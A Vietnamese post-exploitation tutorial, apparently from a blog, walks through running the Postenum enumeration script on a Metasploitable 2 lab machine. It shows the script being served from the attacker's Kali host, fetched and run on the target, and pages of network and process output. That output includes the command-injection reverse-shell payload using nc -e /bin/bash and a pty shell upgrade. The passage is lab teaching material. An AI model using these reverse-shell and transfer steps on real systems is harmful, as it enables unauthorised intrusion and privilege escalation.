thu-thap-du-lieu

Để hiển thị mọi thứ mà Postenum cung cấp cho khai thác sau, đang sử dụng Kali Linux làm máy cục bộ. Đối với mục tiêu, nếu bạn muốn theo dõi và dùng thử công cụ dưới dạng mũ trắng hoặc máy kiểm tra thâm nhập, Metasploitable 2 là một máy ảo dễ bị tấn công có chủ ý tốt để sử dụng.

Giai đoạn 1 Thỏa hiệp ban đầu

Trước khi sử dụng Postenum , trước tiên phải khai thác mục tiêu.Ta có thể sử dụng lệnh tiêm để chạy các lệnh hệ điều hành trên máy chủ và lạm dụng chức năng của nó để lấy shell ngược.

Muốn nâng cấp lớp vỏ mới lên lớp vỏ tương tác đầy đủ. Điều đó sẽ làm cho nó dễ dàng hơn để làm việc nói chung và cũng sẽ cho phép sử dụng hoàn thành tab và lịch sử thiết bị đầu cuối . Và sẽ cho rằng mục tiêu có kết nối hạn chế với internet, vì vậy chúng tôi sẽ cần tìm cách chuyển Postenum từ máy cục bộ của chúng tôi.

Đầu tiên, lấy tập lệnh từ GitHub bằng lệnh wget :

~# wget https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh

--2020-06-18 16:14:29--  https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56110 (55K) [text/plain]
Saving to: ‘postenum.sh’

postenum.sh          100%[======================>]  54.79K  --.-KB/s    in 0.07s

2020-06-18 16:14:29 (749 KB/s) - ‘postenum.sh’ saved [56110/56110]

Tiếp theo, chúng ta có thể bắt đầu một máy chủ đơn giản bằng Python để phục vụ tệp qua HTTP:

~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

Quay lại hệ thống đích, hãy chuyển đến một thư mục có thể ghi để chúng tôi có thể tải xuống và chạy tập lệnh của chúng tôi:

target:/var/vulnerabilities/exec$ cd /var/tmp/

target:/var/tmp$

Lấy tệp chúng tôi đang lưu trữ trên máy của chúng tôi, chú ý sử dụng địa chỉ IP thích hợp:

target:/var/tmp$ wget http://10.10.0.1:8000/postenum.sh

--16:16:24--  http://10.10.0.1:8000/postenum.sh
           => `postenum.sh'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43,831 (43K) [text/x-sh]

100%[=================================================================================================================================================================================================>] 43,831        --.--K/s

16:16:24 (53.19 MB/s) - `postenum.sh' saved [43831/43831]

Chúng ta sẽ thấy yêu cầu nơi máy chủ của chúng ta đang chạy nếu mọi thứ thành công:

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [18/Jun/2020 10:49:36] "GET /postenum.sh HTTP/1.0" 200 -

Và chúng ta có thể giết nó ngay bây giờ khi chúng ta đã chuyển tập lệnh. Sau đó, nếu chúng tôi liệt kê nội dung của thư mục, chúng tôi sẽ thấy rằng tập lệnh chưa được thực thi:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rw-r--r--  1 www-data www-data 43831 Jun 18  2020 postenum.sh

Sử dụng lệnh chmod để thực hiện nó:

target:/var/tmp$ chmod +x postenum.sh

thấy rằng bây giờ nó có thể thực thi:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rw-r--r--  1 www-data www-data 43831 Jun 18  2020 postenum.sh

Để chạy nó, chỉ cần sử dụng dấu gạch chéo cho các tập lệnh Bash:

target:/var/tmp$ ./postenum.sh

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

 Usage   > ./postenum.sh <option>
 Options >
        -a :    All
        -s :    Filesystem [SUID, SGID, Config/DB files, etc.]
        -l :    Shell escape and development tools
        -c :    The most interesting files
        -n :    Network settings
        -p :    Services and cron jobs
        -o :    OS informations and priv esc exploits
        -v :    Sofware's versions
        -t :    Fstab credentials and databases checker

Điều đó sẽ cung cấp cho chúng tôi một biểu ngữ nhỏ đẹp và một số tùy chọn sử dụng.

Giai đoạn 2: Cài đặt mạng

Tùy chọn đầu tiên chúng tôi sẽ giới thiệu sẽ thu thập thông tin và cài đặt mạng . Sử dụng công tắc -n để khởi động nó:

target:/var/tmp$ ./postenum.sh -n

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] COMMUNICATING and NETWORKING
[+] - Check NIC(s) does the system have
[x] Available network interfaces on the system:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address 10.10.0.50
        netmask 255.255.255.0
        gateway 10.10.0.1

[x] Hosts:
127.0.0.1       localhost
127.0.1.1       target.localdomain      target

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

[+] - Check network configuration settings
[x] DNS name servers:
search localdomain
nameserver 172.16.1.1

[x] Networks:
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0

[x] hostname:
target

[x] Get DNS domain or the FQDN:
localdomain

[+] - Check users and hosts communicating with the system
[x] Display all TCP/UDP connected socket, PID/program:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:41801           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:47536           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:44182           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:51902           0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:34846        10.10.0.1:1234          ESTABLISHED 4789/bash
tcp6       0      0 :::2121                 :::*                    LISTEN      -
tcp6       0      0 :::3632                 :::*                    LISTEN      -
tcp6       0      0 :::53                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::5432                 :::*                    LISTEN      -
tcp6       0      0 ::1:953                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
udp        0      0 10.10.0.50:137          0.0.0.0:*                           -
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -
udp        0      0 10.10.0.50:138          0.0.0.0:*                           -
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -
udp        0      0 127.0.0.1:47783         127.0.0.1:47783         ESTABLISHED -
udp        0      0 0.0.0.0:36136           0.0.0.0:*                           -
udp        0      0 0.0.0.0:945             0.0.0.0:*                           -
udp        0      0 10.10.0.50:53           0.0.0.0:*                           -
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -
udp        0      0 0.0.0.0:52929           0.0.0.0:*                           -
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
udp        0      0 0.0.0.0:40927           0.0.0.0:*                           -
udp        0      0 0.0.0.0:55275           0.0.0.0:*                           -
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
udp6       0      0 :::53                   :::*                                -
udp6       0      0 :::50653                :::*                                -

[x] List files based on their Internet address:
COMMAND  PID     USER   FD   TYPE DEVICE SIZE NODE NAME
bash    4789 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash    4789 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)

[x] Last logged in users:
root     pts/0        :0.0             Wed Jun 17 13:22   still logged in
reboot   system boot  2.6.24-16-server Wed Jun 17 13:21 - 13:43  (00:21)
msfadmin tty1                          Wed Jun 17 15:40 - down   (00:00)
msfadmin tty1                          Wed Jun 17 15:40 - 15:40  (00:00)

wtmp begins Wed Jun 18 15:38:50 2020

[x] Who is logged on and what they are doing:
 13:43:00 up 22 min,  1 user,  load average: 0.02, 0.04, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             13:22   21:03m  0.05s  0.05s -bash

[+] - Check cached IP and/or MAC addresses

Chúng ta có thể thấy nó cung cấp cho chúng ta rất nhiều thông tin, bắt đầu với các giao diện mạng và tên máy chủ và địa chỉ. Sau đó nó cho chúng ta thấy một số thông tin DNS và bất kỳ tên tượng trưng nào cho mạng . Cuối cùng, nó cho chúng ta thấy các máy chủ và người dùng liên lạc với hệ thống, theo sau là người dùng đã đăng nhập và thông tin liên quan.

Giai đoạn 3: Dịch vụ và công việc định kỳ

Tùy chọn tiếp theo chúng tôi sẽ xem xét sẽ khám phá các dịch vụ đang chạy và bất kỳ công việc định kỳ nào có trên hệ thống. Sử dụng công tắc -p cho việc này:

target:/var/tmp$ ./postenum.sh -p

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

[x] Root's cron jobs:
no crontab for www-data

[x] The content of /etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[x] View daily cron jobs:
-rwxr-xr-x 1 root root  633 Feb  1  2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22  2008 apt
-rwxr-xr-x 1 root root  314 Apr  4  2008 aptitude
-rwxr-xr-x 1 root root  502 Dec 12  2007 bsdmainutils
-rwxr-xr-x 1 root root   89 Jun 17  2006 logrotate
-rwxr-xr-x 1 root root  954 Mar 12  2008 man-db
-rwxr-xr-x 1 root root  183 Mar  8  2008 mlocate
-rwxr-xr-x 1 root root  383 Apr 28  2010 samba
-rwxr-xr-x 1 root root 3295 Apr  8  2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23  2007 sysklogd
-rwxr-xr-x 1 root root  477 Dec  7  2008 tomcat55

[x] View monthly cron jobs:
-rwxr-xr-x 1 root root 664 Feb 20  2008 proftpd
-rwxr-xr-x 1 root root 129 Apr  8  2008 standard

[x] View weekly cron jobs:
-rwxr-xr-x 1 root root  528 Mar 12  2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28  2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23  2007 sysklogd

[+] - Check for running services, and which service(s) are been running by root
[x] Display every process on the system:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
daemon    3717  0.0  0.2   1836   524 ?        Ss   13:21   0:00 /sbin/portmap
statd     3737  0.0  0.2   1900   728 ?        Ss   13:21   0:00 /sbin/rpc.statd
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
syslog    4034  0.0  0.2   1936   648 ?        Ss   13:21   0:00 /sbin/syslogd -u syslog
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      4071  0.0  0.8   3152  2052 ?        Ss   13:21   0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind      4094  0.0  3.0  35408  7676 ?        Ssl  13:21   0:00 /usr/sbin/named -u bind
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres  4323  0.1  1.9  41340  5068 ?        S    13:21   0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres  4326  0.2  0.5  41340  1376 ?        Ss   13:21   0:03 postgres: writer process
postgres  4327  0.2  0.4  41340  1188 ?        Ss   13:21   0:03 postgres: wal writer process
postgres  4328  0.0  0.5  41476  1432 ?        Ss   13:21   0:01 postgres: autovacuum launcher process
postgres  4329  0.0  0.4  12660  1172 ?        Ss   13:21   0:00 postgres: stats collector process
daemon    4349  0.0  0.1   2316   424 ?        SNs  13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4350  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
daemon    4437  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4479  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
postfix   4484  0.0  0.6   5420  1644 ?        S    13:21   0:00 pickup -l -t fifo -u -c
postfix   4485  0.0  0.6   5460  1688 ?        S    13:21   0:00 qmgr -l -t fifo -u
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd   4545  0.0  0.6   9948  1592 ?        Ss   13:21   0:00 proftpd: (accepting connections)
daemon    4559  0.0  0.1   1984   424 ?        Ss   13:21   0:00 /usr/sbin/atd
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55  4601  5.3 44.8 389632 114652 ?       Sl   13:21   1:12 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
www-data  4621  0.0  0.9  10728  2516 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4624  0.0  0.9  10728  2492 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4626  0.0  0.8  10596  2096 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4628  0.0  0.9  10596  2436 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4629  0.0  0.9  10728  2500 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash
www-data  4759  0.0  0.7  10596  1956 ?        S    13:23   0:00 /usr/sbin/apache2 -k start
www-data  4780  0.0  0.7  10596  1956 ?        S    13:29   0:00 /usr/sbin/apache2 -k start
www-data  4787  0.0  0.5   3248  1460 ?        S    13:29   0:00 sh -c ping  -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
www-data  4789  0.0  0.5   3248  1448 ?        S    13:29   0:00 bash
www-data  4797  0.0  0.9   3960  2472 ?        S    13:31   0:00 python -c import pty;pty.spawn("/bin/bash")
www-data  4798  0.0  0.7   3400  1868 pts/1    Ss   13:31   0:00 /bin/bash
www-data  4927  0.0  0.7   3644  1888 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4956  0.0  0.4   3616  1204 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4957  0.0  0.3   2364   932 pts/1    R+   13:44   0:00 ps aux

[x] Process binaries and permissions:
692K -rwxr-xr-x 1 root root 686K Apr 14  2008 /bin/bash
 48K -rwxr-xr-x 1 root root  48K Apr  4  2008 /bin/dd
   0 lrwxrwxrwx 1 root root    4 Apr 28  2010 /bin/sh -> bash
 16K -rwxr-xr-x 1 root root  15K Apr 14  2008 /sbin/getty
 92K -rwxr-xr-x 1 root root  88K Apr 11  2008 /sbin/init
 24K -rwxr-xr-x 1 root root  23K Nov 23  2007 /sbin/klogd
 16K -rwxr-xr-x 1 root root  15K Dec  3  2007 /sbin/portmap
 40K -rwxr-xr-x 1 root root  39K Dec  2  2008 /sbin/rpc.statd
 32K -rwxr-xr-x 1 root root  32K Nov 23  2007 /sbin/syslogd
 72K -rwxr-xr-x 1 root root  67K Apr 11  2008 /sbin/udevd
 32K -rwxr-xr-x 1 root root  31K May 21  2007 /usr/bin/jsvc
   0 lrwxrwxrwx 1 root root   29 Apr 28  2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20  2012 /usr/bin/unrealircd
 28K -rwxr-xr-x 1 root root  28K Apr 18  2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21  2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar  9  2010 /usr/sbin/apache2
 16K -rwxr-xr-x 1 root root  16K Feb 20  2007 /usr/sbin/atd
 32K -rwxr-xr-x 1 root root  31K Apr  8  2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28  2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr  9  2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28  2010 /usr/sbin/nmbd
 36K -rwxr-xr-x 1 root root  35K Dec  2  2008 /usr/sbin/rpc.idmapd
 76K -rwxr-xr-x 1 root root  72K Dec  2  2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28  2010 /usr/sbin/smbd
368K -rwxr-xr-x 1 root root 363K Apr  6  2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec  3  2007 /usr/sbin/xinetd

[x] Display every process running by root on the system:
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
